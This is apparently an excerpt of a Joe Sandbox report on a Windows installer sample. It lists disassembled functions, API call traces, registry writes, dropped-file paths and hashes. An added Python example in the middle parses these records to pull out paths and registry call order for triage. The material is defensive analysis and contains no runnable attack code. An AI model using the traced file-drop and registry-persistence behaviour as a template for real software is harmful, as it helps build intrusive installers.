  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp$C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll$C:\Users\user\AppData\Local\foreslaaende\Sluggardliness$Call
• API String ID: 1941528284-2623147041
• Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
• Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
• Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
• Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 874 40317d-4031a6 GetTickCount 875 4032e7-4032ef call 402d1a 874->875 876 4031ac-4031d7 call 40330f SetFilePointer 874->876 881 4032f1-4032f6 875->881 882 4031dc-4031ee 876->882 883 4031f0 882->883 884 4031f2-403200 call 4032f9 882->884 883->884 887 403206-403212 884->887 888 4032d9-4032dc 884->888 889 403218-40321e 887->889 888->881 890 403220-403226 889->890 891 403249-403265 call 406390 889->891 890->891 892 403228-403248 call 402d1a 890->892 897 4032e2 891->897 898 403267-40326f 891->898 892->891 899 4032e4-4032e5 897->899 900 403271-403287 WriteFile 898->900 901 4032a3-4032a9 898->901 899->881 903 403289-40328d 900->903 904 4032de-4032e0 900->904 901->897 902 4032ab-4032ad 901->902 902->897 905 4032af-4032c2 902->905 903->904 906 40328f-40329b 903->906 904->899 905->882 907 4032c8-4032d7 SetFilePointer 905->907 906->889 908 4032a1 906->908 907->875 908->905
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                                    • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                                  • WriteFile.KERNELBASE(0040BE78,0040C19F,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                                  • SetFilePointer.KERNELBASE(0021D8CC,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Pointer$CountTickWrite
                                                                                                                                                  • String ID: x>A
                                                                                                                                                  • API String ID: 2146148272-3854404225
                                                                                                                                                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                                  • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                                  • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 909 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 916 4029c7-4029d6 909->916 917 40237d-402385 909->917 918 402387-402394 call 402b3a lstrlenW 917->918 919 402398-40239b 917->919 918->919 922 4023ab-4023ae 919->922 923 40239d-4023aa call 402b1d 919->923 927 4023b0-4023ba call 403062 922->927 928 4023bf-4023d3 RegSetValueExW 922->928 923->922 927->928 929 4023d5 928->929 930 4023d8-4024b2 RegCloseKey 928->930 929->930 930->916 934 402793-40279a 930->934 934->916
                                                                                                                                                  APIs
                                                                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp
                                                                                                                                                  • API String ID: 1356686001-11946093
                                                                                                                                                  • Opcode ID: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
                                                                                                                                                  • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                                  • Opcode Fuzzy Hash: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
                                                                                                                                                  • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 935 4015b9-4015cd call 402b3a call 4059e0 940 401614-401617 935->940 941 4015cf-4015eb call 405962 CreateDirectoryW 935->941 942 401646-402197 call 401423 940->942 943 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 940->943 948 40160a-401612 941->948 949 4015ed-4015f8 GetLastError 941->949 956 4029c7-4029d6 942->956 943->956 959 40163e-401641 943->959 948->940 948->941 952 401607 949->952 953 4015fa-401605 GetFileAttributesW 949->953 952->948 953->948 953->952 959->956
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,75572EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 004059EE
                                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\foreslaaende\Sluggardliness,?,00000000,000000F0), ref: 00401630
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\foreslaaende\Sluggardliness, xrefs: 00401623
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\foreslaaende\Sluggardliness
                                                                                                                                                  • API String ID: 3751793516-3939270230
                                                                                                                                                  • Opcode ID: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
                                                                                                                                                  • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                                  • Opcode Fuzzy Hash: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
                                                                                                                                                  • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
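Every "APIs" list in this report uses one fixed record shape: an optional `Part of subcall function <addr>:` prefix, then `Api.MODULE(arg,arg,...)`, then `ref: <addr>`, with `?` standing for an argument the analyzer could not resolve. When triaging a report like this one, the useful step is to pull the file-system paths and the registry call order out of those records rather than read them by eye. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the records into structured calls, lists the Windows paths that appear as arguments, and reports the calls of one category in order. The input lines are copied from the function blocks in this section; the API-to-category table is the example's own assumption, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: API records copied from the function blocks in this
# report section (raw string so the backslashes stay literal).
SAMPLE_RECORDS = r"""
• RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
• RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
  • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,75572EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 004059EE
• CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\foreslaaende\Sluggardliness,?,00000000,000000F0), ref: 00401630
• GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
• wsprintfW.USER32 ref: 100024E1
"""

# One record: optional subcall prefix, Api.MODULE, optional (args), ref: addr
RECORD_RE = re.compile(
    r"^•?\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")

# Assumed categorisation: the example's own table, not taken from the report.
FILE_APIS = {"CreateFileW", "ReadFile", "WriteFile", "SetFilePointer", "CreateDirectoryW",
             "SetCurrentDirectoryW", "GetFileAttributesW", "DeleteFileW", "MoveFileW"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: List[str] = field(default_factory=list)
    caller: Optional[str] = None  # set for "Part of subcall function" records

    @property
    def category(self) -> str:
        if self.api.startswith("Reg"):
            return "registry"
        if self.api in FILE_APIS:
            return "filesystem"
        if self.api.startswith(("Global", "Heap", "Virtual")):
            return "memory"
        return "other"

    @property
    def paths(self) -> List[str]:
        """Arguments that look like absolute Windows paths."""
        return [a for a in self.args if WIN_PATH_RE.match(a)]


def split_args(raw: str) -> List[str]:
    """Split the argument list on commas, keeping quoted strings intact."""
    if not raw:
        return []
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted  # quotes are delimiters only; they are dropped
        elif ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur))
    return out


def parse_api_records(text: str) -> List[ApiCall]:
    """Parse every line that matches the record shape; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue
        calls.append(ApiCall(api=m["api"], module=m["module"], ref=m["ref"],
                             args=split_args(m["args"] or ""), caller=m["caller"]))
    return calls


def unique_paths(calls: List[ApiCall]) -> List[str]:
    """Distinct path arguments in first-seen order (a quick IOC list)."""
    seen: List[str] = []
    for c in calls:
        for p in c.paths:
            if p not in seen:
                seen.append(p)
    return seen


def call_sequence(calls: List[ApiCall], category: str) -> List[str]:
    """API names of one category in record order, e.g. the registry write sequence."""
    return [c.api for c in calls if c.category == category]


if __name__ == "__main__":
    parsed = parse_api_records(SAMPLE_RECORDS)
    for c in parsed:
        print(f"{c.ref} {c.category:10} {c.api}.{c.module} paths={c.paths}")
    print("registry sequence:", call_sequence(parsed, "registry"))
    print("paths:", unique_paths(parsed))
```

The quote-aware splitter matters for records like the `CharNextW` one above, where a quoted command line such as `"C:\Users\user\Desktop\________.exe"` would otherwise be cut apart at a comma; records with no parenthesised arguments (`wsprintfW.USER32 ref: ...`) parse to an empty argument list instead of being dropped. On the sample the registry sequence comes out as `RegCreateKeyExW`, `RegSetValueExW`, `RegCloseKey`, which is the create-then-set pattern the second function block shows.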

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 961 10001771-100017ad call 10001b3e 965 100017b3-100017b7 961->965 966 100018be-100018c0 961->966 967 100017c0-100017cd call 100022eb 965->967 968 100017b9-100017bf call 100022a1 965->968 973 100017fd-10001804 967->973 974 100017cf-100017d4 967->974 968->967 975 10001824-10001828 973->975 976 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 973->976 977 100017d6-100017d7 974->977 978 100017ef-100017f2 974->978 979 10001866-1000186c call 1000248d 975->979 980 1000182a-10001864 call 100015cc call 1000248d 975->980 1002 1000186d-10001871 976->1002 983 100017d9-100017da 977->983 984 100017df-100017e0 call 10002868 977->984 978->973 981 100017f4-100017f5 call 10002b23 978->981 979->1002 980->1002 996 100017fa 981->996 985 100017e7-100017ed call 1000260b 983->985 986 100017dc-100017dd 983->986 993 100017e5 984->993 1001 100017fc 985->1001 986->973 986->984 993->996 996->1001 1001->973 1005 10001873-10001881 call 10002450 1002->1005 1006 100018ae-100018b5 1002->1006 1011 10001883-10001886 1005->1011 1012 10001899-100018a0 1005->1012 1006->966 1008 100018b7-100018b8 GlobalFree 1006->1008 1008->966 1011->1012 1013 10001888-10001890 1011->1013 1012->1006 1014 100018a2-100018ad call 10001555 1012->1014 1013->1012 1015 10001892-10001893 FreeLibrary 1013->1015 1014->1006 1015->1012
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                                                                    • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                                                                    • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                                                                    • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                                                                    • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1767494692-3916222277
                                                                                                                                                  • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                                  • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                                                                  • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                                  • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1018 403062-403070 1019 403072-403088 SetFilePointer 1018->1019 1020 40308e-403097 call 40317d 1018->1020 1019->1020 1023 403177-40317a 1020->1023 1024 40309d-4030b0 call 405bd9 1020->1024 1027 403163 1024->1027 1028 4030b6-4030ca call 40317d 1024->1028 1030 403165-403166 1027->1030 1028->1023 1032 4030d0-4030d3 1028->1032 1030->1023 1033 4030d5-4030d8 1032->1033 1034 40313f-403145 1032->1034 1037 403174 1033->1037 1038 4030de 1033->1038 1035 403147 1034->1035 1036 40314a-403161 ReadFile 1034->1036 1035->1036 1036->1027 1039 403168-403171 1036->1039 1037->1023 1040 4030e3-4030ed 1038->1040 1039->1037 1041 4030f4-403106 call 405bd9 1040->1041 1042 4030ef 1040->1042 1041->1027 1045 403108-40311d WriteFile 1041->1045 1042->1041 1046 40313b-40313d 1045->1046 1047 40311f-403122 1045->1047 1046->1030 1047->1046 1048 403124-403137 1047->1048 1048->1040 1049 403139 1048->1049 1049->1037
                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                                  • String ID: x>A
                                                                                                                                                  • API String ID: 539440098-3854404225
                                                                                                                                                  • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                                  • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                                  • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                                  • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

Control-flow Graph
control_flow_graph 1050 405db7-405de9 RegOpenKeyExW 1051 405e2b-405e2e 1050->1051 1052 405deb-405e0a RegQueryValueExW 1050->1052 1053 405e18 1052->1053 1054 405e0c-405e10 1052->1054 1056 405e1b-405e25 RegCloseKey 1053->1056 1055 405e12-405e16 1054->1055 1054->1056 1055->1053 1055->1056 1056->1051
APIs
• RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
• RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
• RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpenQueryValue
• String ID: Call
• API String ID: 3677997916-1824292864
• Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
• Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
• Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
• Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9

Control-flow Graph
control_flow_graph 1057 405b85-405b91 1058 405b92-405bc6 GetTickCount GetTempFileNameW 1057->1058 1059 405bd5-405bd7 1058->1059 1060 405bc8-405bca 1058->1060 1062 405bcf-405bd2 1059->1062 1060->1058 1061 405bcc 1060->1061 1061->1062
APIs
• GetTickCount.KERNEL32 ref: 00405BA3
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-1331003597
• Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
• Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
• Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
• Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
APIs
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
  • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
  • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
• WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
Memory Dump Source
